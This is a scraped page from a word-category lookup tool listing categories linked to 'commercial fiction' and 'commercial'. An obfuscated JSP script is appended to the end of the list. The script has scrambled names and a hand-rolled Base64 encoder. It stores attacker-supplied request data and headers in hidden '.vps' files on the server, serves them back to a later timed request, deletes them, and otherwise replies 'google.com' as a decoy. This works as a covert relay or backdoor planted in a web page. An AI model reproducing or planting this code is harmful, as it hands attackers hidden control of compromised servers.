Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Members for Fine-Grained Categories
commercial_fiction
:
mystery,
novel,
romance,
fantasy,
crime_fiction,
plot,
Modifiers matching
fiction
:
popular,
adult,
narrative,
western,
teenage,
modern,
fine,
good,
literary,
historical,
real,
short,
psychological,
original,
commercial,
long,
Simple categories matching
commercial
:
appliance,
oil,
facility,
building,
grain,
transportation,
diet,
establishment,
trade,
structure,
vehicle,
fixture,
practice,
site,
medium,
communication,
solution,
painting,
location,
waste,
treadmill,
genre,
use,
sphere,
premises,
fibre,
fish,
cooler,
property,
entity,
polyester,
aircraft,
record,
solvent,
skill,
liquid,
substrate,
preparation,
cleaners,
assets,
cost,
job,
deposit,
polymer,
tongue,
idea,
printer,
auto,
crop,
pool,
mollusk,
program,
power,
unit,
photography,
sign,
change,
part,
outfit,
floor,
ventilator,
assay,
beverage,
entrepreneur,
litigation,
matter,
cookware,
shellfish,
attribute,
watercraft,
endeavor,
aspect,
service,
street,
machinery,
info,
touch,
solid,
fishing,
antibacterial,
liabilities,
port,
land,
photograph,
truck,
recording,
drupe,
flour,
flooring,
chow,
monomer,
document,
citrus,
stuff,
improvement,
merchandise,
work,
food,
plant,
indicator,
software,
driver,
code,
instrumentation,
point,
wax,
warehouse,
revenue,
transaction,
statement,
issue,
compound,
print,
advertising,
tobacco,
drug,
resin,
stone,
technology,
group,
grade,
surface,
toy,
furniture,
wood,
measure,
activity,
ship,
secret,
airline,
investor,
lecithin,
environment,
arena,
gum,
body,
blower,
field,
reference,
criterion,
feature,
settlement,
fabric,
party,
billboard,
relationship,
item,
fleet,
equipment,
battery,
erection,
gathering,
contractor,
favor,
label,
show,
transactions,
alcohol,
hardware,
worker,
agent,
syrup,
livestock,
usage,
works,
occupation,
union,
function,
organisation,
clay,
business,
dispute,
piece,
linen,
filler,
quality,
force,
component,
commodity,
attraction,
market,
trailer,
expense,
literature,
means,
pressure,
whitefish,
seed,
consideration,
right,
gatekeeper,
requirement,
material,
noise,
tax,
sex,
aquarium,
transport,
content,
finance,
traffic,
provider,
conveyance,
capability,
chemical,
gear,
plantation,
discipline,
music,
supplier,
symbol,
tree,
condiment,
task,
dock,
network,
fiber,
organization,
family,
blender,
assistance,
exhibition,
printing,
book,
subject,
computer,
refrigerator,
publication,
lease,
tool,
operator,
calendar,
animal,
arrangement,
source,
firm,
installation,
phospholipid,
cleaner,
refrigerant,
instrumentality,
thing,
trust,
innovation,
value,
condition,
accessory,
product,
gym,
insured,
fuel,
creation,
space,
industry,
difficulty,
powder,
magazine,
lighting,
van,
device,
glasses,
cleanser,
communications,
magnetometer,
portion,
operations,
hydrocarbon,
concern,
distribution,
gambling,
application,
alloy,
prawn,
marketplace,
identifier,
amusement,
exchange,
film,
hotel,
entertainment,
construction,
trait,
diamine,
education,
center,
sport,
lubricant,
giant,
mixture,
intermediary,
meat,
architecture,
trivia,
venture,
door,
characteristic,
farm,
undertaking,
oilseed,
constraint,
organism,
company,
encryption,
agreement,
sorbent,
user,
interior,
wagon,
package,
formula,
plastic,
vegetable,
hardwood,
drink,
estate,
fruit,
craft,
production,
website,
investment,
gaming,
institution,
editor,
car,
process,
game,
bivalve,
policy,
directory,
seafood,
connection,
accommodation,
sponsor,
machine,
toiletry,
grass,
district,
trap,
fiction,
petrochemical,
souvenir,
enterprise,
strip,
sector,
ingredient,
terms,
outlet,
meeting,
offering,
shape,
output,
crime,
importance,
shop,
development,
interest,
casino,
centre,
data,
event,
recreation,
project,
oven,
boat,
metal,
situation,
system,
polysaccharide,
society,
documentation,
hub,
area,
publisher,
processing,
information,
language,
mammal,
setting,
species,
contract,
controller,
culture,
database,
complex,
support,
message,
fare,
bread,
expert,
gas,
explosive,
apparatus,
nature,
foodstuff,
agriculture,
operation,
control,
trading,
purpose,
risk,
diver,
effort,
carrier,
zone,
article,
energy,
vessel,
starches,
carbon,
object,
place,
fluid,
insurance,
mineral,
feed,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>